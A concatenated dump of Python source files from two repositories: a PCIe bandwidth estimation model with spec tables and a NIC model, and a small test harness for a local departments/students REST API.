        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
}
# Ack Limit,
# see PCIe Base Spec rev 5.0 Table 3-7, 3-8, and 3-9
# On-wire size of an Ack DLLP
Ack_Size = 8  # 2 B Phys + 4 B DLLP + 2B DLLP CRC
# Ack latency limit in symbol times, indexed [version][lanes][mps]
Ack_Limits = {
    'gen1' : {
        'x1' : {128: 237, 256: 416, 512: 559, 1024: 1071, 2048: 2095, 4096: 4143},
        'x2' : {128: 128, 256: 217, 512: 289, 1024: 545, 2048: 1057, 4096: 2081},
        'x4' : {128: 73, 256: 118, 512: 154, 1024: 282, 2048: 538, 4096: 1050},
        'x8' : {128: 67, 256: 107, 512: 86, 1024: 150, 2048: 278, 4096: 534},
        'x16' : {128: 48, 256: 72, 512: 86, 1024: 150, 2048: 278, 4096: 534},
        'x32' : {128: 33, 256: 45, 512: 52, 1024: 84, 2048: 148, 4096: 276},
    },
    'gen2' : {
        'x1' : {128: 288, 256: 467, 512: 610, 1024: 1122, 2048: 2146, 4096: 4194},
        'x2' : {128: 179, 256: 268, 512: 340, 1024: 596, 2048: 1108, 4096: 2132},
        'x4' : {128: 124, 256: 169, 512: 205, 1024: 333, 2048: 589, 4096: 1101},
        'x8' : {128: 118, 256: 158, 512: 137, 1024: 201, 2048: 329, 4096: 585},
        'x16' : {128: 99, 256: 123, 512: 137, 1024: 201, 2048: 329, 4096: 585},
        'x32' : {128: 84, 256: 96, 512: 103, 1024: 135, 2048: 199, 4096: 237},
    },
    # gen3/gen4/gen5 entries are identical below
    'gen3' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
    'gen4' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
    'gen5' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
}
# SKIP ordered sets for clock compensation (inserted on all lanes)
SKIP_Interval = 1538
SKIP_Length = 4
# DLLP header (6 bytes) plus start and end symbol at Phys layer
DLLP_Hdr = 8
# Maximum Bandwidth usable at TLP layer. This takes into account the
# recommended rates for ACKs and FC updates as per spec as well as the SKIP
# ordered sets for clock compensation. The Bandwidth can be further reduced
# due to bit errors or different chipset configurations.
# Indexed [version][lanes][mps].
TLP_bw = {}
for ver in Vers:
    for lanes in Laness:
        for mps in MPSs:
            if not ver in TLP_bw:
                TLP_bw[ver] = {}
            if not lanes in TLP_bw[ver]:
                TLP_bw[ver][lanes] = {}
            # each overhead is the DLLP size over its occurrence interval
            ack_overhead = float(Ack_Size) / float(Ack_Limits[ver][lanes][mps])
            fc_overhead = float(FC_Size) / float(FC_Guide[ver][lanes][mps])
            skip_overhead = float(SKIP_Length) / float(SKIP_Interval)
            overheads = ack_overhead + fc_overhead + skip_overhead
            # deduct overheads for ACKs and FC updates
            TLP_bw[ver][lanes][mps] = Raw[ver][lanes] - Raw[ver][lanes] * overheads
# TLP Types (sizes in bytes)
TLP_Hdr = 4  # 4 byte generic TLP header
TLP_MWr_32_Hdr = 8  # Mem Write 4 byte for address + 4 bytes
TLP_MWr_64_Hdr = 12  # Mem Write 8 byte for address + 4 bytes
TLP_MRd_32_Hdr = 8  # Mem Read 4 byte for address + 4 bytes
TLP_MRd_64_Hdr = 12  # Mem Read 8 byte for address + 4 bytes
TLP_Msg = 16  # Message Request Header
TLP_Cpl_Hdr = 8  # Completion no Data 4 bytes completer ID + extra
TLP_CplD_Hdr = 8  # Completion with Data 4 bytes completer ID + extra
TLP_Dig = 4  # Optional digest trailer, 4 bytes, e.g. for ECRC
# There are a few other TLP Types (MRdLk, IORd, IOWr CfgRd0, CfgRd1,
# CfgWr0, CfgWr1, CplLk, CplDLk) which we ignore for now
# Full on-wire header sizes, indexed by address size and optional ECRC
TLP_MWr_Hdr_Szs = {
    32: {0: DLLP_Hdr + TLP_Hdr + TLP_MWr_32_Hdr,
         1: DLLP_Hdr + TLP_Hdr + TLP_MWr_32_Hdr + TLP_Dig},
    64: {0: DLLP_Hdr + TLP_Hdr + TLP_MWr_64_Hdr,
         1: DLLP_Hdr + TLP_Hdr + TLP_MWr_64_Hdr + TLP_Dig}
}
TLP_MRd_Hdr_Szs = {
    32: {0: DLLP_Hdr + TLP_Hdr + TLP_MRd_32_Hdr,
         1: DLLP_Hdr + TLP_Hdr + TLP_MRd_32_Hdr + TLP_Dig},
    64: {0: DLLP_Hdr + TLP_Hdr + TLP_MRd_64_Hdr,
         1: DLLP_Hdr + TLP_Hdr + TLP_MRd_64_Hdr + TLP_Dig}
}
# Completion header size, indexed by the ECRC setting only
TLP_CplD_Hdr_Szs = {
    0: DLLP_Hdr + TLP_Hdr + TLP_CplD_Hdr,
    1: DLLP_Hdr + TLP_Hdr + TLP_CplD_Hdr + TLP_Dig
}
# Size of the payload of an MSI (Message Signaled Interrupt) write
MSI_SIZE = 4
class Cfg():
    """A glorified struct to represent a specific PCIe device configuration.

    Validates every field against the spec-defined value lists above and
    pre-computes the on-wire header sizes and the usable TLP bandwidth
    for this configuration.
    """
    def __init__(self, version, lanes, addr, ecrc,
                 mps, mrrs, rcb, rcb_chunks=False):
        """Use this class as a struct for the PCI configuration

        @param version: String, 'gen1', 'gen2' 'gen3', 'gen4', 'gen5'
        @param lanes: String, 'x1', 'x2', 'x4, 'x8', 'x16', 'x32'
        @param addr: either 32 or 64. What type of addresses to use
        @param ecrc: either 0 or 1, indicating if ECRC was configured
        @param mps: Maximum Payload Size configured
        @param mrrs: Maximum Read Request Size configured
        @param rcb: Read Completion Boundaries
        @param rcb_chunks: Boolean, are read requests chopped into RCB or MPS
        @raises Exception if any parameter has an unsupported value
        """
        if version not in Vers:
            raise Exception("Unknown PCIe version: %s" % version)
        self.version = version
        if lanes not in Laness:
            raise Exception("Unknown Lane configuration: %s" % lanes)
        self.lanes = lanes
        if addr not in [32, 64]:
            raise Exception("Unknown address length: %d" % addr)
        self.addr = addr
        if ecrc not in [0, 1]:
            raise Exception("Unknown ECRC value: %d" % ecrc)
        self.ecrc = ecrc
        if mps not in MPSs:
            raise Exception("Unknown MPS value: %d" % mps)
        self.mps = mps
        if mrrs not in MRRSs:
            # BUG FIX: error message previously interpolated 'mps'
            raise Exception("Unknown MRRS value: %d" % mrrs)
        self.mrrs = mrrs
        if rcb not in RCBs:
            # BUG FIX: error message previously interpolated 'mps'
            raise Exception("Unknown RCB value: %d" % rcb)
        self.rcb = rcb
        self.rcb_chunks = rcb_chunks
        # derive Header Sizes for Memory Write, Read and Completion
        self.TLP_MWr_Hdr_Sz = TLP_MWr_Hdr_Szs[addr][ecrc]
        self.TLP_MRd_Hdr_Sz = TLP_MRd_Hdr_Szs[addr][ecrc]
        self.TLP_CplD_Hdr_Sz = TLP_CplD_Hdr_Szs[ecrc]
        self.TLP_bw = TLP_bw[version][lanes][mps]
        self.RAW_bw = Raw[version][lanes]

    def pp(self):
        """Pretty-print the configuration to stdout."""
        print("PCIe configuration: Version=%s, Lanes=%s" % (self.version, self.lanes))
        print("                    mps=%s, mrrs=%s, rcb=%s, rcb_chunks=%s" % \
            (self.mps, self.mrrs, self.rcb, self.rcb_chunks))
        print("                    addr=%d ecrc=%d" % (self.addr, self.ecrc))
        print("                    => TLP BW=%.2f Gb/s" % (self.TLP_bw))
## Functions to calculate PCIe bandwidth for different PCIe
## configurations and operations.
# Direction of Transfer from the device perspective.
# These are bit flags so they can be OR-ed together (see DIR_BOTH).
DIR_RX = 1
DIR_TX = 2
DIR_BOTH = DIR_RX | DIR_TX
class BW_Spec():
    """Input bandwidth specification passed to all model functions.

    The spec carries an RX and a TX bandwidth (seen from the device)
    plus a type flag. With BW_RAW the values are raw TLP-level link
    bandwidths and the model derives the achievable effective bandwidth
    (data bytes over data bytes plus overhead). With BW_EFF the values
    are target effective bandwidths and the model derives the raw link
    bandwidth required to reach them. A glorified struct.
    """

    BW_RAW = 0
    BW_EFF = 1

    def __init__(self, rx_bw=0.0, tx_bw=0.0, bw_type=0):
        if bw_type not in (self.BW_RAW, self.BW_EFF):
            raise Exception("Unknown BW type")
        self.rx_bw = rx_bw
        self.tx_bw = tx_bw
        self.type = bw_type
class BW_Res():
    """Bandwidth result returned by all model functions.

    Holds the required raw TLP bandwidth and the achieved effective
    bandwidth for each direction. RX and TX are always seen from the
    PCIe peer initiating the transfer. A glorified struct.
    """

    def __init__(self, rx_raw, rx_eff, tx_raw, tx_eff):
        # receive side: raw link bandwidth and effective data bandwidth
        self.rx_raw = rx_raw
        self.rx_eff = rx_eff
        # transmit side: raw link bandwidth and effective data bandwidth
        self.tx_raw = tx_raw
        self.tx_eff = tx_eff
# When run as a script, print a raw vs. usable-TLP bandwidth table
# for every generation/lane combination at MPS 128 and 256.
if __name__ == '__main__':
    # Print out some useful data
    for mps in [128, 256]:
        for ver in Vers:
            print("PCIe Version:", ver)
            print("Lanes Phys BW (Gb/s) Data BW (Gb/s) MPS=%d" % mps)
            for lanes in Laness:
                print("%5s %6.2f %6.2f" % \
                    (lanes, Raw[ver][lanes],
                     TLP_bw[ver][lanes][mps]))
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,462
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/__init__.py
|
# Public submodules of the model package (note: 'util' is intentionally
# internal and not exported here).
__all__ = [
    "eth",
    "mem_bw",
    "niantic",
    "pcie",
    "simple_nic",
]
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,463
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/simple_nic.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A simple NIC model"""
import math
from . import pcie
from . import util
# pylint: disable=invalid-name
# pylint: disable=bad-whitespace
def bw(pcicfg, bwspec, direction, pkt_size):
    """
    Estimate the PCIe bandwidth requirements for a very simple NIC.

    @param pcicfg    PCIe configuration (pcie.Cfg)
    @param bwspec    Bandwidth specification (pcie.BW_Spec)
    @param direction pcie.DIR_RX, pcie.DIR_TX or pcie.DIR_BOTH
    @param pkt_size  Size of the Ethernet frame (subtract 4 to calculate
                     with FCS stripping)
    @returns A BW_Res object

    We assume that descriptors are 128bit in size and a single RX and TX ring.

    TX from the host:
    1. Host updates the TX queue tail pointer (PCIe write: rx)
    2. Device DMAs descriptor (PCIe read: rx/tx)
    3. Device DMAs packet content (PCIe read: rx/tx)
    4. Device generates interrupt (PCIe write: tx)
    5. Host reads TX queue head pointer (PCIe read: rx/tx)

    RX to the host:
    1. Host updates RX Queue Tail Pointer -> free buf (PCIe write: rx)
    2. Device DMAs descriptor from host (PCIe read: rx/tx)
    3. Device DMAs packet to host (PCIe write: tx)
    4. Device writes back RX descriptor (PCIe write: tx)
    5. Device generates interrupt (PCIe write: tx)
    6. Host reads RX queue head pointer (PCIe read: rx/tx)

    We assume these steps are performed for every packet.
    """
    # Descriptor and pointer sizes in bytes (descriptors are 128 bit)
    tx_desc_sz = 16
    rx_desc_sz = 16
    rx_desc_wb_sz = 16
    ptr_sz = 4

    if not direction & pcie.DIR_BOTH:
        raise Exception("Unknown Direction %d" % direction)

    data_B = pkt_size

    # Packet TX
    tx_rx_data_B = 0  # bytes for TX received by the device
    tx_tx_data_B = 0  # bytes for TX transmitted by the device
    # H: tail pointer write
    tx_rx_data_B += ptr_sz + pcicfg.TLP_MWr_Hdr_Sz
    # D: read descriptor
    _rd_sz = tx_desc_sz
    tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mrrs)))
    tx_tx_data_B += tlps * pcicfg.TLP_MRd_Hdr_Sz
    if pcicfg.rcb_chunks:
        tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.rcb)))
    else:
        tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mps)))
    tx_rx_data_B += (tlps * pcicfg.TLP_CplD_Hdr_Sz) + _rd_sz
    # D: data DMA reads
    tlps = int(math.ceil(float(data_B) / float(pcicfg.mrrs)))
    tx_tx_data_B += tlps * pcicfg.TLP_MRd_Hdr_Sz
    if pcicfg.rcb_chunks:
        tlps = int(math.ceil(float(data_B) / float(pcicfg.rcb)))
    else:
        tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
    tx_rx_data_B += (tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_B
    # D: send IRQ
    tx_tx_data_B += pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz
    # H: read head pointer
    tx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz
    tx_tx_data_B += ptr_sz + pcicfg.TLP_CplD_Hdr_Sz
    # done

    # Packet RX
    rx_rx_data_B = 0  # bytes for RX received by the device
    rx_tx_data_B = 0  # bytes for RX transmitted by the device
    # H: tail pointer write
    rx_rx_data_B += ptr_sz + pcicfg.TLP_MWr_Hdr_Sz
    # D: read descriptors
    rx_tx_data_B += pcicfg.TLP_MRd_Hdr_Sz
    rx_rx_data_B += rx_desc_sz + pcicfg.TLP_CplD_Hdr_Sz
    # D: DMA write
    tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
    # BUG FIX: this previously used '=' which discarded the descriptor
    # read request bytes accumulated above; accumulate with '+=' instead.
    rx_tx_data_B += (tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_B
    # D: Write back descriptors
    rx_tx_data_B += rx_desc_wb_sz + pcicfg.TLP_MWr_Hdr_Sz
    # D: send IRQ (Depending on setting)
    rx_tx_data_B += pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz
    # H: read head pointer
    rx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz
    rx_tx_data_B += ptr_sz + pcicfg.TLP_CplD_Hdr_Sz
    # done

    # we now know how many bytes are transfered in each direction for
    # both RX and TX. Lets work out how much we can transfer etc.
    return util.gen_res(bwspec, direction, data_B,
                        tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,464
|
pcie-bench/pcie-model
|
refs/heads/master
|
/pcie_bw.py
|
#! /usr/bin/env python3
#
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A simple script to generate data for PCIe and ethernet bandwidth estimates"""
import sys
from optparse import OptionParser
from model import pcie, eth, mem_bw
# pylint: disable=too-many-locals
OUT_FILE = "pcie_bw.dat"
def main():
    """Generate PCIe read/write and Ethernet bandwidth estimates.

    Parses command line options describing a PCIe link configuration,
    then writes one row per payload size (1..1500 bytes) to the output
    file: PCIe write/read/read-write bandwidth and transactions per
    second, plus (for sizes >= 64) 40G Ethernet bandwidth, packets per
    second and per-frame time.
    """
    usage = """usage: %prog [options]"""
    # NOTE(review): optparse has been deprecated in favour of argparse
    # since Python 2.7/3.2; kept as-is to preserve exact CLI behaviour.
    parser = OptionParser(usage)
    parser.add_option('--mps', dest='MPS', type="int", action='store',
                      default=256,
                      help='Set the maximum payload size of the link')
    parser.add_option('--mrrs', dest='MRRS', type="int", action='store',
                      default=512,
                      help='Set the maximum read request size of the link')
    parser.add_option('--rcb', dest='RCB', type="int", action='store',
                      default=64,
                      help='Set the read completion boundary of the link')
    parser.add_option('--lanes', dest='lanes', type="string", action='store',
                      default='x8',
                      help='Set num lanes (x2, x4, x8, x16, or x32)')
    parser.add_option('--gen', dest='gen', type="string", action='store',
                      default='gen3',
                      help='Set PCIe version (gen1, gen2, gen3, gen4, or gen5)')
    parser.add_option('--addr', dest='addr', type="int", action='store',
                      default=64,
                      help='Set the number of address bits (32 or 64)')
    parser.add_option('--ecrc', dest='ecrc', type="int", action='store',
                      default=0,
                      help='Use ECRC (0 or 1)')
    parser.add_option('-o', '--outfile', dest='FILE',
                      default=OUT_FILE, action='store',
                      help='File where to write the data to')
    (options, _) = parser.parse_args()
    # pcie.Cfg validates the option values and raises on bad input
    pciecfg = pcie.Cfg(version=options.gen,
                       lanes=options.lanes,
                       addr=options.addr,
                       ecrc=options.ecrc,
                       mps=options.MPS,
                       mrrs=options.MRRS,
                       rcb=options.RCB)
    print("PCIe Config:")
    pciecfg.pp()
    ethcfg = eth.Cfg('40GigE')
    tlp_bw = pciecfg.TLP_bw
    # drive the model with the raw TLP-level bandwidth of the link
    bw_spec = pcie.BW_Spec(tlp_bw, tlp_bw, pcie.BW_Spec.BW_RAW)
    dat = open(options.FILE, "w")
    # gnuplot-style quoted column headers
    dat.write("\"Payload(Bytes)\" "
              "\"PCIe Write BW\" "
              "\"PCIe Write Trans/s\" "
              "\"PCIe Read BW\" "
              "\"PCIe Read Trans/s\" "
              "\"PCIe Read/Write BW\" "
              "\"PCIe Read/Write Trans/s\" "
              "\"40G Ethernet BW\" "
              "\"40G Ethernet PPS\" "
              "\"40G Ethernet Frame time (ns)\" "
              "\n")
    for size in range(1, 1500 + 1):
        wr_bw = mem_bw.write(pciecfg, bw_spec, size)
        rd_bw = mem_bw.read(pciecfg, bw_spec, size)
        rdwr_bw = mem_bw.read_write(pciecfg, bw_spec, size)
        # transactions/s: effective bandwidth (Gb/s) -> bytes/s -> per size
        wr_trans = (wr_bw.tx_eff * 1000 * 1000 * 1000 / 8) / size
        rd_trans = (rd_bw.rx_eff * 1000 * 1000 * 1000 / 8) / size
        rdwr_trans = (rdwr_bw.tx_eff * 1000 * 1000 * 1000 / 8) / size
        if size >= 64:
            # Ethernet columns only for valid frame sizes (>= 64 bytes)
            eth_bw = ethcfg.bps_ex(size) / (1000 * 1000 * 1000.0)
            eth_pps = ethcfg.pps_ex(size)
            eth_lat = 1.0 * 1000 * 1000 * 1000 / eth_pps
            dat.write("%d %.2f %.1f %.2f %.1f %.2f %.1f %.2f %d %.2f\n" %
                      (size,
                       wr_bw.tx_eff, wr_trans,
                       rd_bw.rx_eff, rd_trans,
                       rdwr_bw.tx_eff, rdwr_trans,
                       eth_bw, eth_pps, eth_lat))
        else:
            dat.write("%d %.2f %.1f %.2f %.1f %.2f %.1f\n" %
                      (size,
                       wr_bw.tx_eff, wr_trans,
                       rd_bw.rx_eff, rd_trans,
                       rdwr_bw.tx_eff, rdwr_trans))
    dat.close()
# Script entry point: exit status is main()'s return value (None -> 0).
if __name__ == '__main__':
    sys.exit(main())
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,465
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_students.py
|
from Base.base_tools import BaseTools
class ResourceStudent(BaseTools):
    """Resource-layer wrappers for the student REST endpoints.

    All methods are currently unimplemented stubs; presumably each will
    delegate to BaseTools HTTP helpers — TODO confirm against BaseTools.
    """

    # Query all students
    def resource_get_student_all(self):
        """Fetch all student records (stub)."""
        pass

    # Query a single, specified student
    def resource_get_student_one(self):
        """Fetch one student record (stub)."""
        pass

    # Query a list of students
    def resource_get_student_list(self):
        """Fetch a list of student records (stub)."""
        pass

    # Fuzzy (partial-match) query
    def resource_get_student_partial(self):
        """Fetch students via a partial/fuzzy match (stub)."""
        pass

    # Combined-criteria query
    def resource_get_student_combo(self):
        """Fetch students via combined query criteria (stub)."""
        pass

    # Create a new student
    def resource_add_student(self):
        """Add a student record (stub)."""
        pass

    # Update an existing student
    def resource_update_student(self):
        """Update a student record (stub)."""
        pass

    # Delete a student
    def resource_delete_student(self):
        """Delete a student record (stub)."""
        pass
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,466
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/__init__.py
|
# Server base address: host, port and the departments API root path
server_port="http://127.0.0.1:8000/api/departments/"
"""
学院信息:
"""
# URL for querying all departments (the collection endpoint)
depart_url_all=server_port
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,467
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test01.py
|
import json
import requests
# 查询学院所有
# str=requests.get('http://127.0.0.1:8000/api/departments/')
# # 断言状态码是否为200
# print("获取状态码:",str.status_code)
# print("获取的json值为:",str.json())
# 查询学院指定
# str=requests.get(url='http://127.0.0.1:8000/api/departments/T03/')
#
# print(str.status_code)
# print(str.url)
# dec={'dep_id': 'T03', 'dep_name': 'C++学院', 'master_name': 'C++-Master', 'slogan': 'Here is Slogan'}
# dec={'dep_id': 'T03'}
# dec="T03"
# str=str.json()
# dec=json.dumps(dec)
# print("类型为:",type(str))
# print(str)
# try:
# assert dec == str
# print("断言成功,相等")
# except:
# print("断言失败,不相等")
# 查询学院 list
# str=requests.get(url='http://127.0.0.1:8000/api/departments/',params={"$dep_id_list":"T03,T04"})
# print(str.status_code)
# print(str.url)
# print(str.json())
# 查询学院 组合
# :http://127.0.0.1:8000/api/departments/?slogan=Here is Slogan&master_name=Test-Master&dep_name=Test学院
# url="http://127.0.0.1:8000/api/departments/"
# params={"slogan":"Here is Slogan","master_name":"Test-Master","dep_name":"Test学院"}
# str=requests.get(url=url,params=params)
# print("url:",str.url)
# print(str.text)
# 学院新增
# data=json.dumps( {
# "data": [
# {
# "dep_id":"T010_02",
# "dep_name":"Test01学院",
# "master_name":"Test-Master",
# "slogan":"Here is Slogan"
# }
# ]
# })
#
# headers = {'content-type': 'application/json'}
# # str=requests.post("http://127.0.0.1:8000/api/departments/",data=data,headers=headers)
# # print("新增后数据为:",str.text)
#
# # 学院更新
# url="http://127.0.0.1:8000/api/departments/T010_02/"
# data=json.dumps( {
# "data": [
# {
# "dep_id": "T010_02",
# "dep_name": "C-java学院",
# "master_name": "C++-Master",
# "slogan": "Here is Slogan"
# }
# ]
# })
# str=requests.put(url=url,data=data,headers=headers)
# print(str.url)
# print(str.status_code)
# print(str.headers)
# str=str.text
# print(str)
# try:
# assert "C-java学院" in str
# print("断言成功")
# except:
# print("失败")
# 删除学院
# url="http://127.0.0.1:8000/api/departments/T010_02/"
# str=requests.delete(url)
# print(str.status_code)
# print("请求url为:",str.url)
# print("返回值为:",str.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,468
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/write_yaml.py
|
import yaml
# Fixture payload serialized to Data/depart_add.yml: one department record
data={
    "data": [
        {
        "dep_id":"T01",
        "dep_name":"Test学院",
        "master_name":"Test-Master",
        "slogan":"Here is Slogan"
        }
    ]
}
def write_yaml():
    """Serialize the module-level `data` fixture to ../Data/depart_add.yml as UTF-8 YAML."""
    with open("../Data/depart_add.yml", "w", encoding="utf-8") as out:
        yaml.dump(data, stream=out, encoding="utf-8", allow_unicode=True)

if __name__ == '__main__':
    write_yaml()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,469
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_depart.py
|
import json
from Base.base_tools import BaseTools
import Resources
class ResourceDepart(BaseTools):
    """Resource layer for the department REST API.

    Builds URLs from Resources.depart_url_all and delegates the HTTP work to
    the BaseTools verb helpers.
    """

    def resource_condition(self, condition=None, id=None):
        """URL helper with two modes.

        With `condition` (a query string): performs the GET immediately and
        returns the result dict. With `id`: only returns the item URL, which
        get-one / update / delete then feed to a verb helper.
        """
        if condition is not None:
            url = Resources.depart_url_all + "?" + condition
            return self.get_method(url)
        elif id is not None:
            url = Resources.depart_url_all + id + '/'
            return url

    def resource_get_depart_all(self):
        """GET the whole department collection."""
        return self.get_method(Resources.depart_url_all)

    def resource_get_depart_one(self, id):
        """GET a single department by id."""
        url = self.resource_condition(id=id)
        return self.get_method(url)

    def resource_get_depart_list(self, condition):
        """GET departments matching an id-list query string."""
        return self.resource_condition(condition=condition)

    def resource_get_depart_partial(self, condition):
        """GET departments via a fuzzy-match query string."""
        return self.resource_condition(condition=condition)

    def resource_get_depart_combo(self, condition):
        """GET departments via a combined-field query string."""
        return self.resource_condition(condition=condition)

    def resource_add_depart(self, data):
        """POST a new department; `data` is the request payload dict."""
        url = Resources.depart_url_all
        return self.post_method(url, data)

    def resource_update_depart(self, id, data):
        """PUT updated `data` (a dict) for department `id`."""
        url = self.resource_condition(id=id)
        return self.put_method(url, data)

    def resource_delete_depart(self, id):
        """DELETE department `id`."""
        url = self.resource_condition(id=id)
        return self.delete_method(url)

    def resource_get_depid(self, dect):
        """Return the first created record from an add-department response.

        Accepts either a JSON string or an already-decoded dict. The original
        called json.load(dect), which requires a file-like object and raised
        on both input kinds; json.loads / pass-through fixes that.
        """
        if isinstance(dect, str):
            dect = json.loads(dect)
        record = dect.get("create_success").get("results")[0]
        print("json.load值为:", record)
        return record
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,470
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/base_tools.py
|
import json
import requests
class BaseTools():
    """Thin wrapper around `requests` shared by all resource classes.

    Every verb helper (except delete, see below) normalizes the response
    into a plain dict via get_result().
    """

    def get_result(self, response):
        """Normalize a `requests` response into a dict.

